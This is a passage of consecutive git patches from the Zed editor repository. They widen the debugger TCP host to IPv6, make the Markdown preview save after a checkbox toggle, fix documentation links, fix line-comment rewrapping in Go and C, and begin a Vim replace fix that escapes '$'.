a/crates/dap_adapters/src/python.rs +++ b/crates/dap_adapters/src/python.rs @@ -14,7 +14,7 @@ use smol::fs::File; use smol::io::AsyncReadExt; use smol::lock::OnceCell; use std::ffi::OsString; -use std::net::Ipv4Addr; +use std::net::IpAddr; use std::str::FromStr; use std::{ ffi::OsStr, @@ -42,7 +42,7 @@ impl PythonDebugAdapter { const LANGUAGE_NAME: &'static str = "Python"; async fn generate_debugpy_arguments<'a>( - host: &'a Ipv4Addr, + host: &'a IpAddr, port: u16, launch_mode: DebugpyLaunchMode<'a>, user_installed_path: Option<&'a Path>, @@ -380,7 +380,7 @@ impl PythonDebugAdapter { } if let Some(hostname) = config_host { - tcp_connection.host = Some(hostname.parse().context("hostname must be IPv4")?); + tcp_connection.host = Some(hostname.parse().context("invalid IP address")?); } tcp_connection.port = config_port; DebugpyLaunchMode::AttachWithConnect { host: config_host } @@ -974,7 +974,7 @@ mod tests { .contains("Cannot have two different ports") ); - let host = Ipv4Addr::new(127, 0, 0, 1); + let host = IpAddr::V4(std::net::Ipv4Addr::LOCALHOST); let config_with_host_conflict = json!({ "request": "attach", "connect": { @@ -1018,7 +1018,7 @@ mod tests { #[gpui::test] async fn test_attach_with_connect_mode_generates_correct_arguments() { - let host = Ipv4Addr::new(127, 0, 0, 1); + let host = IpAddr::V4(std::net::Ipv4Addr::LOCALHOST); let port = 5678; let args_without_host = PythonDebugAdapter::generate_debugpy_arguments( @@ -1071,7 +1071,7 @@ mod tests { #[gpui::test] async fn test_debugpy_install_path_cases() { - let host = Ipv4Addr::new(127, 0, 0, 1); + let host = IpAddr::V4(std::net::Ipv4Addr::LOCALHOST); let port = 5678; // Case 1: User-defined debugpy path (highest precedence) diff --git a/crates/extension_host/src/wasm_host/wit/since_v0_8_0.rs b/crates/extension_host/src/wasm_host/wit/since_v0_8_0.rs index 683e69e08704dc..24cf0affd77589 100644 --- a/crates/extension_host/src/wasm_host/wit/since_v0_8_0.rs +++ b/crates/extension_host/src/wasm_host/wit/since_v0_8_0.rs @@ -24,7 +24,7 @@ use project::project_settings::ProjectSettings; use semver::Version; use std::{ env, - net::Ipv4Addr, + net::{IpAddr, Ipv4Addr}, path::{Path, PathBuf}, str::FromStr, sync::{Arc, OnceLock}, @@ -117,7 +117,7 @@ impl TryFrom for extension::StartDebuggingReques impl From for extension::TcpArguments { fn from(value: TcpArguments) -> Self { Self { - host: value.host.into(), + host: IpAddr::V4(Ipv4Addr::from_bits(value.host)), port: value.port, timeout: value.timeout, } @@ -127,7 +127,10 @@ impl From for extension::TcpArguments { impl From for TcpArgumentsTemplate { fn from(value: extension::TcpArgumentsTemplate) -> Self { Self { - host: value.host.map(Ipv4Addr::to_bits), + host: value.host.and_then(|addr| match addr { + IpAddr::V4(v4) => Some(v4.to_bits()), + IpAddr::V6(_) => None, + }), port: value.port, timeout: value.timeout, } @@ -137,7 +140,7 @@ impl From for TcpArgumentsTemplate { impl From for extension::TcpArgumentsTemplate { fn from(value: TcpArgumentsTemplate) -> Self { Self { - host: value.host.map(Ipv4Addr::from_bits), + host: value.host.map(|bits| IpAddr::V4(Ipv4Addr::from_bits(bits))), port: value.port, timeout: value.timeout, } @@ -904,13 +907,21 @@ impl dap::Host for WasmState { let (host, port, timeout) = ::dap::configure_tcp_connection(task::TcpArgumentsTemplate { port: template.port, - host: template.host.map(Ipv4Addr::from_bits), + host: template + .host + .map(|bits| IpAddr::V4(Ipv4Addr::from_bits(bits))), timeout: template.timeout, }) .await?; + let host_bits = match host { + IpAddr::V4(v4) => v4.to_bits(), + IpAddr::V6(_) => { + anyhow::bail!("IPv6 addresses are not supported in the extension API") + } + }; Ok(TcpArguments { port, - host: host.to_bits(), + host: host_bits, timeout, }) }) diff --git a/crates/project/src/debugger/dap_store.rs b/crates/project/src/debugger/dap_store.rs index 6d320bc06e69ba..7ac9c02fe4fbf2 100644 --- a/crates/project/src/debugger/dap_store.rs +++ b/crates/project/src/debugger/dap_store.rs @@ -47,7 +47,7 @@ use std::{ borrow::Borrow, collections::BTreeMap, ffi::OsStr, - net::Ipv4Addr, + net::{IpAddr, Ipv4Addr}, path::{Path, PathBuf}, sync::{Arc, Once}, }; @@ -323,7 +323,7 @@ impl DapStore { let port_forwarding; let connection; if let Some(c) = binary.connection { - let host = Ipv4Addr::LOCALHOST; + let host = IpAddr::V4(Ipv4Addr::LOCALHOST); let port; if remote.read_with(cx, |remote, _cx| remote.shares_network_interface()) { port = c.port; diff --git a/crates/project/src/debugger/session.rs b/crates/project/src/debugger/session.rs index 87e11cfd97a2f6..feba6ff5520681 100644 --- a/crates/project/src/debugger/session.rs +++ b/crates/project/src/debugger/session.rs @@ -48,7 +48,7 @@ use serde_json::Value; use smol::net::{TcpListener, TcpStream}; use std::any::TypeId; use std::collections::{BTreeMap, VecDeque}; -use std::net::Ipv4Addr; +use std::net::{IpAddr, Ipv4Addr}; use std::ops::RangeInclusive; use std::path::PathBuf; use std::time::Duration; @@ -2901,7 +2901,7 @@ impl Session { ); None } else { - let port = TcpTransport::unused_port(Ipv4Addr::LOCALHOST) + let port = TcpTransport::unused_port(IpAddr::V4(Ipv4Addr::LOCALHOST)) .await .context("getting port for DAP")?; request diff --git a/crates/task/src/debug_format.rs b/crates/task/src/debug_format.rs index 5609e2565c8497..72c12324c7350f 100644 --- a/crates/task/src/debug_format.rs +++ b/crates/task/src/debug_format.rs @@ -4,7 +4,7 @@ use gpui::SharedString; use log as _; use schemars::JsonSchema; use serde::{Deserialize, Serialize}; -use std::net::Ipv4Addr; +use std::net::IpAddr; use std::path::PathBuf; use util::{debug_panic, schemars::add_new_subschema}; @@ -20,7 +20,7 @@ pub struct TcpArgumentsTemplate { /// The host that the debug adapter is listening too /// /// Default: 127.0.0.1 - pub host: Option, + pub host: Option, /// The max amount of time in milliseconds to connect to a tcp DAP before returning an error /// /// Default: 2000ms @@ -29,8 +29,9 @@ pub struct TcpArgumentsTemplate { impl TcpArgumentsTemplate { /// Get the host or fallback to the default host - pub fn host(&self) -> Ipv4Addr { - self.host.unwrap_or_else(|| Ipv4Addr::new(127, 0, 0, 1)) + pub fn host(&self) -> IpAddr { + self.host + .unwrap_or(IpAddr::V4(std::net::Ipv4Addr::LOCALHOST)) } pub fn from_proto(proto: proto::TcpHost) -> Result { @@ -389,8 +390,7 @@ impl DebugTaskFile { }, "host": { "type": "string", - "pattern": "^((25[0-5]|(2[0-4]|1\\d|[1-9]|)\\d)\\.?\\b){4}$", - "description": "The host that the debug adapter is listening to (default: 127.0.0.1)" + "description": "The host that the debug adapter is listening to, as an IPv4 or IPv6 address (default: 127.0.0.1)" }, "timeout": { "type": "integer", From c478bc28da8c5118765fbcd77d4f5c7593fa3361 Mon Sep 17 00:00:00 2001 From: Pronsh <105874877+Priyansh4444@users.noreply.github.com> Date: Mon, 27 Apr 2026 01:47:27 -0700 Subject: [PATCH 041/231] markdown_preview: Fix Ctrl+S saving checkbox toggle state (#53236) Changes Made: - Adding the `Item::can_save()`, `save()`, `save_as()`, `can_save_as()` functions to help the Editor save when a checkbox is toggled - Small refactor to seperate checkbox toggle and refreshing preview - Adding support for both `/...` and `\\...` for windows users. [NOTE: I no longer own a window's machine and I am unsure if this is correct, and will fix it immediately if this is wrong] - Resolving preview paths, strips out the fragment, and image paths are coalesced to None if they don't exist - Adding Tests for the added behaviour [NOTE: would love feedback since this is the first time I am writing tests, and had a bit of assistance from an AI, but manually reviewed the code and ran the application and it seemed fine] Self-Review Checklist: - [X] I've reviewed my own diff for quality, security, and reliability - [X] Unsafe blocks (if any) have justifying comments - [X] The content is consistent with the [UI/UX checklist](https://github.com/zed-industries/zed/blob/main/CONTRIBUTING.md#uiux-checklist) - [X] Tests cover the new/changed behavior - [X] Performance impact has been considered and is acceptable Closes #46901 Release Notes: - Fixed Crtl+S saving while toggling checkbox in preview mode --- Cargo.lock | 2 + crates/markdown_preview/Cargo.toml | 5 + .../src/markdown_preview_view.rs | 366 ++++++++++++++---- 3 files changed, 288 insertions(+), 85 deletions(-) diff --git a/Cargo.lock b/Cargo.lock index f825e9f2bc60c5..44cff847bb9799 100644 --- a/Cargo.lock +++ b/Cargo.lock @@ -10430,11 +10430,13 @@ version = "0.1.0" dependencies = [ "anyhow", "editor", + "fs", "gpui", "language", "log", "markdown", "project", + "serde_json", "settings", "tempfile", "theme", diff --git a/crates/markdown_preview/Cargo.toml b/crates/markdown_preview/Cargo.toml index bdb90deb19ce13..9b978ce14f507b 100644 --- a/crates/markdown_preview/Cargo.toml +++ b/crates/markdown_preview/Cargo.toml @@ -32,4 +32,9 @@ workspace.workspace = true zed_actions.workspace = true [dev-dependencies] +editor = { workspace = true, features = ["test-support"] } +fs.workspace = true +gpui = { workspace = true, features = ["test-support"] } +serde_json.workspace = true tempfile.workspace = true +workspace = { workspace = true, features = ["test-support"] } diff --git a/crates/markdown_preview/src/markdown_preview_view.rs b/crates/markdown_preview/src/markdown_preview_view.rs index f8c9df8dbdf5b7..76b46a520d5391 100644 --- a/crates/markdown_preview/src/markdown_preview_view.rs +++ b/crates/markdown_preview/src/markdown_preview_view.rs @@ -18,6 +18,7 @@ use markdown::{ CodeBlockRenderer, CopyButtonVisibility, Markdown, MarkdownElement, MarkdownFont, MarkdownOptions, MarkdownStyle, }; +use project::Project; use project::search::SearchQuery; use settings::Settings; use theme::{SystemAppearance, Theme, ThemeRegistry}; @@ -25,7 +26,7 @@ use theme_settings::ThemeSettings; use ui::{ContextMenu, WithScrollbar, prelude::*, right_click_menu}; use util::markdown::split_local_url_fragment; use util::normalize_path; -use workspace::item::{Item, ItemBufferKind, ItemHandle}; +use workspace::item::{Item, ItemBufferKind, ItemHandle, SaveOptions}; use workspace::searchable::{ Direction, SearchEvent, SearchOptions, SearchToken, SearchableItem, SearchableItemHandle, }; @@ -665,27 +666,62 @@ impl MarkdownPreviewView { } }) .on_checkbox_toggle(move |source_range, new_checked, window, cx| { - let task_marker = if new_checked { "[x]" } else { "[ ]" }; - editor_for_checkbox.update(cx, |editor, cx| { - editor.edit( - [( - MultiBufferOffset(source_range.start) - ..MultiBufferOffset(source_range.end), - task_marker, - )], - cx, - ); - }); - if let Some(view) = view_handle.upgrade() { - cx.update_entity(&view, |this, cx| { - this.update_markdown_from_active_editor(false, false, window, cx); - }); - } + Self::apply_checkbox_toggle_to_editor( + &editor_for_checkbox, + source_range, + new_checked, + cx, + ); + Self::refresh_preview(view_handle.clone(), window, cx); }); } markdown_element } + + fn apply_checkbox_toggle_to_editor( + editor: &Entity, + source_range: std::ops::Range, + new_checked: bool, + cx: &mut App, + ) { + let task_marker = if new_checked { "[x]" } else { "[ ]" }; + let expected_existing_marker = if new_checked { "[ ]" } else { "[x]" }; + + editor.update(cx, |editor, cx| { + let existing_marker: String = editor + .buffer() + .read(cx) + .snapshot(cx) + .text_for_range( + MultiBufferOffset(source_range.start)..MultiBufferOffset(source_range.end), + ) + .collect(); + + debug_assert_eq!(existing_marker, expected_existing_marker); + + editor.edit( + [( + MultiBufferOffset(source_range.start)..MultiBufferOffset(source_range.end), + task_marker, + )], + cx, + ); + }); + } + + fn refresh_preview(view_handle: WeakEntity, window: &mut Window, cx: &mut App) { + if let Some(view) = view_handle.upgrade() { + let preview_is_focused = view.read(cx).focus_handle.contains_focused(window, cx); + if !preview_is_focused { + return; + } + + cx.update_entity(&view, |this, cx| { + this.update_markdown_from_active_editor(false, false, window, cx); + }); + } + } } fn handle_url_click( @@ -745,7 +781,9 @@ fn open_preview_url( window: &mut Window, cx: &mut App, ) { - if let Some(path) = resolve_preview_path(url.as_ref(), base_directory.as_deref()) + let (path_text, _) = split_preview_url(url.as_ref()); + + if let Some(path) = resolve_preview_path(path_text, base_directory.as_deref()) && let Some(workspace) = workspace.upgrade() { let _ = workspace.update(cx, |workspace, cx| { @@ -767,14 +805,22 @@ fn open_preview_url( cx.open_url(url.as_ref()); } +fn split_preview_url(url: &str) -> (&str, Option<&str>) { + match url.split_once('#') { + Some((path, fragment)) => (path, Some(fragment)), + None => (url, None), + } +} + fn resolve_preview_path(url: &str, base_directory: Option<&Path>) -> Option { if url.starts_with("http://") || url.starts_with("https://") { return None; } - let decoded_url = urlencoding::decode(url) + let (path_text, _) = split_preview_url(url); + let decoded_url = urlencoding::decode(path_text) .map(|decoded| decoded.into_owned()) - .unwrap_or_else(|_| url.to_string()); + .unwrap_or_else(|_| path_text.to_string()); let candidate = PathBuf::from(&decoded_url); if candidate.is_absolute() && candidate.exists() { @@ -809,15 +855,18 @@ fn resolve_preview_image( .map(|decoded| decoded.into_owned()) .unwrap_or_else(|_| dest_url.to_string()); - let decoded_path = Path::new(&decoded); - - if let Ok(relative_path) = decoded_path.strip_prefix("/") { + if let Some(stripped) = ['/', '\\'] + .iter() + .find_map(|prefix| decoded.strip_prefix(*prefix)) + { if let Some(root) = workspace_directory { - let absolute_path = root.join(relative_path); + let absolute_path = root.join(stripped); if absolute_path.exists() { return Some(ImageSource::Resource(Resource::Path(Arc::from( absolute_path.as_path(), )))); + } else { + return None; } } } @@ -828,9 +877,8 @@ fn resolve_preview_image( base_directory?.join(decoded) }; - Some(ImageSource::Resource(Resource::Path(Arc::from( - path.as_path(), - )))) + path.exists() + .then(|| ImageSource::Resource(Resource::Path(Arc::from(path.as_path())))) } impl Focusable for MarkdownPreviewView { @@ -881,6 +929,52 @@ impl Item for MarkdownPreviewView { Some("Markdown Preview Opened") } + fn can_save(&self, cx: &App) -> bool { + self.active_editor + .as_ref() + .is_some_and(|editor_state| editor_state.editor.read(cx).can_save(cx)) + } + + fn can_save_as(&self, cx: &App) -> bool { + self.active_editor + .as_ref() + .is_some_and(|editor_state| editor_state.editor.read(cx).can_save_as(cx)) + } + + fn save( + &mut self, + options: SaveOptions, + project: Entity, + window: &mut Window, + cx: &mut Context, + ) -> Task> { + self.active_editor + .as_ref() + .map(|editor_state| { + editor_state + .editor + .update(cx, |editor, cx| editor.save(options, project, window, cx)) + }) + .unwrap_or_else(|| Task::ready(Ok(()))) + } + + fn save_as( + &mut self, + project: Entity, + path: project::ProjectPath, + window: &mut Window, + cx: &mut Context, + ) -> Task> { + self.active_editor + .as_ref() + .map(|editor_state| { + editor_state + .editor + .update(cx, |editor, cx| editor.save_as(project, path, window, cx)) + }) + .unwrap_or_else(|| Task::ready(Ok(()))) + } + fn to_item_events(_event: &Self::Event, _f: &mut dyn FnMut(workspace::item::ItemEvent)) {} fn buffer_kind(&self, _cx: &App) -> ItemBufferKind { @@ -1095,98 +1189,200 @@ mod tests { use crate::markdown_preview_view::ImageSource; use crate::markdown_preview_view::Resource; use crate::markdown_preview_view::resolve_preview_image; - use anyhow::Result; - use std::fs; - use tempfile::TempDir; + use editor::Editor; + use gpui::{Entity, TestAppContext}; + use serde_json::json; + use std::path::PathBuf; + use std::sync::Arc; + use util::path; + use util::test::TempTree; + use workspace::{AppState, MultiWorkspace, SaveIntent, Workspace, open_paths}; - use super::resolve_preview_path; + use super::{MarkdownPreviewView, resolve_preview_path}; #[test] - fn resolves_relative_preview_paths() -> Result<()> { - let temp_dir = TempDir::new()?; - let base_directory = temp_dir.path(); + fn resolves_relative_preview_path_and_missing_cases() { + let tree = markdown_fixture_tree(json!({ + "notes.md": "# Notes" + })); + let base_directory = markdown_fixture_directory(&tree); let file = base_directory.join("notes.md"); - fs::write(&file, "# Notes")?; assert_eq!( - resolve_preview_path("notes.md", Some(base_directory)), + resolve_preview_path("notes.md", Some(base_directory.as_path())), Some(file) ); assert_eq!( - resolve_preview_path("nonexistent.md", Some(base_directory)), + resolve_preview_path("nonexistent.md", Some(base_directory.as_path())), None ); assert_eq!(resolve_preview_path("notes.md", None), None); - - Ok(()) } #[test] - fn resolves_urlencoded_preview_paths() -> Result<()> { - let temp_dir = TempDir::new()?; - let base_directory = temp_dir.path(); - let file = base_directory.join("release notes.md"); - fs::write(&file, "# Release Notes")?; + fn resolves_urlencoded_preview_path_and_ignores_fragment_component() { + let tree = markdown_fixture_tree(json!({ + "release notes.md": "# Release Notes", + "notes.md": "# Notes" + })); + let base_directory = markdown_fixture_directory(&tree); assert_eq!( - resolve_preview_path("release%20notes.md", Some(base_directory)), - Some(file) + resolve_preview_path( + "release%20notes.md#overview", + Some(base_directory.as_path()) + ), + Some(base_directory.join("release notes.md")) + ); + assert_eq!( + resolve_preview_path("notes.md#L10", Some(base_directory.as_path())), + Some(base_directory.join("notes.md")) ); - - Ok(()) } #[test] - fn resolves_workspace_absolute_preview_images() -> Result<()> { - let temp_dir = TempDir::new()?; - let workspace_directory = temp_dir.path(); - - let base_directory = workspace_directory.join("docs"); - fs::create_dir_all(&base_directory)?; + fn does_not_treat_web_links_as_preview_files() { + assert_eq!(resolve_preview_path("https://zed.dev", None), None); + assert_eq!(resolve_preview_path("http://example.com", None), None); + } + #[test] + fn resolves_workspace_absolute_preview_image_path_and_rejects_missing() { + let tree = TempTree::new(json!({ + "docs": {}, + "test_image.png": "mock data" + })); + let workspace_directory = tree.path(); + let base_directory = markdown_fixture_directory(&tree); let image_file = workspace_directory.join("test_image.png"); - fs::write(&image_file, "mock data")?; - let resolved_success = resolve_preview_image( - "/test_image.png", - Some(&base_directory), - Some(workspace_directory), - ); - - match resolved_success { - Some(ImageSource::Resource(Resource::Path(p))) => { - assert_eq!(p.as_ref(), image_file.as_path()); - } - _ => panic!("Expected successful resolution to be a Resource::Path"), + for workspace_root_relative_path in ["/test_image.png", "\\test_image.png"] { + let resolved = resolve_preview_image( + workspace_root_relative_path, + Some(&base_directory), + Some(workspace_directory), + ); + assert_resolved_preview_image_path(resolved, image_file.as_path()); } - let resolved_missing = resolve_preview_image( + let missing = resolve_preview_image( "/missing_image.png", Some(&base_directory), Some(workspace_directory), ); + assert!(missing.is_none()); + } - let expected_missing_path = if std::path::Path::new("/missing_image.png").is_absolute() { - std::path::PathBuf::from("/missing_image.png") - } else { - // join is to retain windows path prefix C:/ - #[expect(clippy::join_absolute_paths)] - base_directory.join("/missing_image.png") - }; + #[gpui::test] + async fn toggles_task_checkbox_and_saves_when_preview_is_active(cx: &mut TestAppContext) { + let app_state = init_test(cx); + app_state + .fs + .as_fake() + .insert_tree( + path!("/dir"), + json!({ + "todo.md": "- [ ] Finish work\n" + }), + ) + .await; - match resolved_missing { - Some(ImageSource::Resource(Resource::Path(p))) => { - assert_eq!(p.as_ref(), expected_missing_path.as_path()); - } - _ => panic!("Expected missing file to fallback to a Resource::Path"), - } + cx.update(|cx| { + open_paths( + &[PathBuf::from(path!("/dir/todo.md"))], + app_state.clone(), + workspace::OpenOptions::default(), + cx, + ) + }) + .await + .unwrap(); + + let multi_workspace = cx.update(|cx| cx.windows()[0].downcast::().unwrap()); + let preview = multi_workspace + .update(cx, |multi_workspace, window, cx| { + let workspace = multi_workspace.workspace().clone(); + let editor: Entity = workspace + .read(cx) + .active_item(cx) + .and_then(|item| item.act_as::(cx)) + .unwrap(); + + workspace.update(cx, |workspace, cx| { + let preview = MarkdownPreviewView::create_markdown_view( + workspace, + editor.clone(), + window, + cx, + ); + workspace.active_pane().update(cx, |pane, cx| { + pane.add_item(Box::new(preview.clone()), true, true, None, window, cx) + }); + preview + }) + }) + .unwrap(); + cx.run_until_parked(); + + let save_task = multi_workspace + .update(cx, |multi_workspace, window, cx| { + let workspace: Entity = multi_workspace.workspace().clone(); + let view_handle = preview.downgrade(); + assert!(preview.read(cx).focus_handle.contains_focused(window, cx)); + preview.update(cx, |preview, cx| { + let editor = preview.active_editor.as_ref().unwrap().editor.clone(); + MarkdownPreviewView::apply_checkbox_toggle_to_editor(&editor, 2..5, true, cx); + }); + MarkdownPreviewView::refresh_preview(view_handle, window, cx); + + workspace.update(cx, |workspace: &mut Workspace, cx| { + workspace.save_active_item(SaveIntent::Save, window, cx) + }) + }) + .unwrap(); + + save_task.await.unwrap(); + cx.run_until_parked(); + + assert_eq!( + app_state + .fs + .load(path!("/dir/todo.md").as_ref()) + .await + .unwrap(), + "- [x] Finish work\n" + ); + } - Ok(()) + fn init_test(cx: &mut TestAppContext) -> Arc { + cx.update(|cx| { + let state = AppState::test(cx); + editor::init(cx); + crate::init(cx); + state + }) } - #[test] - fn does_not_treat_web_links_as_preview_paths() { - assert_eq!(resolve_preview_path("https://zed.dev", None), None); - assert_eq!(resolve_preview_path("http://example.com", None), None); + fn markdown_fixture_tree(docs_tree: serde_json::Value) -> TempTree { + TempTree::new(json!({ + "docs": docs_tree + })) + } + + fn markdown_fixture_directory(tree: &TempTree) -> PathBuf { + tree.path().join("docs") + } + + #[track_caller] + fn assert_resolved_preview_image_path( + resolved: Option, + expected_path: &std::path::Path, + ) { + match resolved { + Some(ImageSource::Resource(Resource::Path(path))) => { + assert_eq!(path.as_ref(), expected_path); + } + _ => panic!("Expected preview image to resolve to a local path"), + } } } From 9588124df49f189ffd9481c45a2402fb24e224a5 Mon Sep 17 00:00:00 2001 From: Kunall Banerjee Date: Mon, 27 Apr 2026 04:48:27 -0400 Subject: [PATCH 042/231] docs: Update broken references (#48608) MIME-Version: 1.0 Content-Type: text/plain; charset=UTF-8 Content-Transfer-Encoding: 8bit I might turn this into a big PR with multiple fixes. So no, this is not going stale. I’m updating this as and when I find broken refs or stale content. Release Notes: - N/A --------- Co-authored-by: Marshall Bowers --- docs/src/ai/llm-providers.md | 2 +- docs/src/remote-development.md | 6 +----- 2 files changed, 2 insertions(+), 6 deletions(-) diff --git a/docs/src/ai/llm-providers.md b/docs/src/ai/llm-providers.md index ec217ff081351f..f5d6f345968434 100644 --- a/docs/src/ai/llm-providers.md +++ b/docs/src/ai/llm-providers.md @@ -282,7 +282,7 @@ Alternatively, you can provide an OAuth token via the `GH_COPILOT_TOKEN` environ > **Note**: If you don't see specific models in the dropdown, you may need to enable them in your [GitHub Copilot settings](https://github.com/settings/copilot/features). -To use Copilot Enterprise with Zed (for both agent and completions), you must configure your enterprise endpoint as described in [Configuring GitHub Copilot Enterprise](./edit-prediction.md#github-copilot-enterprise). +To use Copilot Enterprise with Zed (for both agent and completions), you must configure your enterprise endpoint as described in [Configuring GitHub Copilot Enterprise](./edit-prediction.md#using-github-copilot-enterprise). ### Google AI {#google-ai} diff --git a/docs/src/remote-development.md b/docs/src/remote-development.md index 4ea6c5856d43f8..9092de2cac33da 100644 --- a/docs/src/remote-development.md +++ b/docs/src/remote-development.md @@ -234,7 +234,7 @@ Each connection tries to run the development server in proxy mode. This mode wil In the case that reconnecting fails, the daemon will not be re-used. That said, unsaved changes are by default persisted locally, so that you do not lose work. You can always reconnect to the project at a later date and Zed will restore unsaved changes. -If you are struggling with connection issues, you should be able to see more information in the Zed log `cmd-shift-p Open Log`. If you are seeing things that are unexpected, please file a [GitHub issue](https://github.com/zed-industries/zed/issues/new) or reach out in the #remoting-feedback channel in the [Zed Discord](https://zed.dev/community-links). +If you are struggling with connection issues, you should be able to see more information in the Zed log `cmd-shift-p Open Log`. If you are seeing things that are unexpected, please file a [GitHub issue](https://github.com/zed-industries/zed/issues/new) or reach out in the #support forums on [Discord](https://zed.dev/community-links). ## Supported SSH Options @@ -258,10 +258,6 @@ Note that we deliberately disallow some options (for example `-t` or `-T`) that - You can't open files from the remote Terminal by typing the `zed` command. -## Feedback - -Please join the #remoting-feedback channel in the [Zed Discord](https://zed.dev/community-links). - ## See also - [Running & Testing](./running-testing.md): Run tasks, terminal commands, and From c90a672a72a176e198a25913bccbf221bc3748f1 Mon Sep 17 00:00:00 2001 From: Nathan Witmer Date: Mon, 27 Apr 2026 02:51:08 -0600 Subject: [PATCH 043/231] Fix line comment rewrap in golang and C/C++ (#54931) Self-Review Checklist: - [x] I've reviewed my own diff for quality, security, and reliability - [x] Unsafe blocks (if any) have justifying comments - [x] The content is consistent with the [UI/UX checklist](https://github.com/zed-industries/zed/blob/main/CONTRIBUTING.md#uiux-checklist) - [x] Tests cover the new/changed behavior - [x] Performance impact has been considered and is acceptable Closes #54737. #48752 added empty-prefix `block_comment` entries to several language configs (Go, C, C++, JSONC, Python, JSX inner) to support the new toggle-block-comments action. In `Editor::rewrap_impl`, the comment-format matcher used `buffer.contains_str_at(indent_end, &config.prefix)` to decide whether the current line is a continuation of a block comment. When the language is configured with an empty prefix, this is true on every line. `//` (and `#`) line comments inside a `comment` override scope were classified as `BlockLine("")` and never reached the line-comment fallback. The result was that the line-comment prefix was not stripped before wrapping and not re-prepended after, embedding `//` markers as text in the wrapped paragraph. Skip the BlockLine arm when the configured prefix is empty so the matcher falls through to `line_comment_prefixes`. I've included regression tests for both golang (which adds a new treesitter dep to the editor package) and C/C++. Release Notes: - Fixed line comment rewrapping in golang and C/C++ --- Cargo.lock | 1 + crates/editor/Cargo.toml | 1 + crates/editor/src/editor.rs | 3 +- crates/editor/src/editor_tests.rs | 56 +++++++++++++++++++++++++++++++ 4 files changed, 60 insertions(+), 1 deletion(-) diff --git a/Cargo.lock b/Cargo.lock index 44cff847bb9799..0149c9e199e408 100644 --- a/Cargo.lock +++ b/Cargo.lock @@ -5513,6 +5513,7 @@ dependencies = [ "tracing", "tree-sitter-bash", "tree-sitter-c", + "tree-sitter-go", "tree-sitter-html", "tree-sitter-md", "tree-sitter-python", diff --git a/crates/editor/Cargo.toml b/crates/editor/Cargo.toml index e97cc68c2f956e..c88d1d2c4cd052 100644 --- a/crates/editor/Cargo.toml +++ b/crates/editor/Cargo.toml @@ -124,6 +124,7 @@ settings = { workspace = true, features = ["test-support"] } text = { workspace = true, features = ["test-support"] } theme = { workspace = true, features = ["test-support"] } tree-sitter-c.workspace = true +tree-sitter-go.workspace = true tree-sitter-html.workspace = true tree-sitter-rust.workspace = true tree-sitter-typescript.workspace = true diff --git a/crates/editor/src/editor.rs b/crates/editor/src/editor.rs index 8110c211a502c3..ee6b2be18b8590 100644 --- a/crates/editor/src/editor.rs +++ b/crates/editor/src/editor.rs @@ -14003,7 +14003,8 @@ impl Editor { Some(CommentFormat::BlockCommentWithEnd(config.clone())) } (Some(config), _) | (_, Some(config)) - if buffer.contains_str_at(indent_end, &config.prefix) => + if !config.prefix.is_empty() + && buffer.contains_str_at(indent_end, &config.prefix) => { Some(CommentFormat::BlockLine(config.prefix.to_string())) } diff --git a/crates/editor/src/editor_tests.rs b/crates/editor/src/editor_tests.rs index ea666367127cb2..3a23bb1147b152 100644 --- a/crates/editor/src/editor_tests.rs +++ b/crates/editor/src/editor_tests.rs @@ -8451,6 +8451,62 @@ async fn test_rewrap_block_comments(cx: &mut TestAppContext) { } } +#[gpui::test] +async fn test_rewrap_line_comment_in_go(cx: &mut TestAppContext) { + init_test(cx, |settings| { + settings.languages.0.extend([( + "Go".into(), + LanguageSettingsContent { + allow_rewrap: Some(language_settings::RewrapBehavior::InComments), + preferred_line_length: Some(40), + ..Default::default() + }, + )]) + }); + + let mut cx = EditorTestContext::new(cx).await; + + let go_lang = languages::language("go", tree_sitter_go::LANGUAGE.into()); + + cx.update_buffer(|buffer, cx| buffer.set_language(Some(go_lang), cx)); + cx.set_state(indoc! {" + // Lorem ipsum dolor sit amet, consectetur adipiscing elit.ˇ + "}); + cx.update_editor(|e, window, cx| e.rewrap(&Rewrap, window, cx)); + cx.assert_editor_state(indoc! {" + // Lorem ipsum dolor sit amet, + // consectetur adipiscing elit.ˇ + "}); +} + +#[gpui::test] +async fn test_rewrap_line_comment_in_c(cx: &mut TestAppContext) { + init_test(cx, |settings| { + settings.languages.0.extend([( + "C".into(), + LanguageSettingsContent { + allow_rewrap: Some(language_settings::RewrapBehavior::InComments), + preferred_line_length: Some(40), + ..Default::default() + }, + )]) + }); + + let mut cx = EditorTestContext::new(cx).await; + + let c_lang = languages::language("c", tree_sitter_c::LANGUAGE.into()); + + cx.update_buffer(|buffer, cx| buffer.set_language(Some(c_lang), cx)); + cx.set_state(indoc! {" + // Lorem ipsum dolor sit amet, consectetur adipiscing elit.ˇ + "}); + cx.update_editor(|e, window, cx| e.rewrap(&Rewrap, window, cx)); + cx.assert_editor_state(indoc! {" + // Lorem ipsum dolor sit amet, + // consectetur adipiscing elit.ˇ + "}); +} + #[gpui::test] async fn test_hard_wrap(cx: &mut TestAppContext) { init_test(cx, |_| {}); From 844646dc2df420cbaaa7d5aabc120390f242338b Mon Sep 17 00:00:00 2001 From: Phillip Davis <80721410+phdavis1027@users.noreply.github.com> Date: Mon, 27 Apr 2026 04:53:44 -0400 Subject: [PATCH 044/231] Fix vim replace not escaping `$` (#53277) Self-Review Checklist: - [x] I've reviewed my own diff for quality, security, and reliability - [x] Unsafe blocks (if any) have justifying comments - [x] The content is consistent with the [UI/UX checklist](https://github.com/zed-industries/zed/blob/main/CONTRIBUTING.md#uiux-checklist) - [x] Tests cover the new/changed behavior - [x] Performance impact has been considered and is acceptable Closes ##42292 The text inserted in the search ('\$SEARCH') and replace ('$$OTHER') inputs of the top-panel is a little anti-aesthetic, but that seems out of scope for this issue. Release Notes: - '$' in the second clause of vim-style '%s/find/replace/g' actions is correctly escaped. Co-authored-by: Conrad Irwin --- crates/vim/src/normal/search.rs | 42 ++++++++++++++++++- .../test_replace_literal_dollar.json | 25 +++++++++++ 2 files changed, 66 insertions(+), 1 deletion(-) create mode 100644 crates/vim/test_data/test_replace_literal_dollar.json diff --git a/crates/vim/src/normal/search.rs b/crates/vim/src/normal/search.rs index 549e5666834616..e7d17af1e3eb1d 100644 --- a/crates/vim/src/normal/search.rs +++ b/crates/vim/src/normal/search.rs @@ -669,7 +669,9 @@ impl Replacement { // convert a vim query into something more usable by zed. // we don't attempt to fully convert between the two regex syntaxes, // but we do flip \( and \) to ( and ) (and vice-versa) in the pattern, - // and convert \0..\9 to $0..$9 in the replacement so that common idioms work. + // convert \0..\9 to $0..$9 in the replacement so that common idioms work, + // and escape literal `$` to `$$` in the replacement so vim's literal `$` + // is not interpreted as a 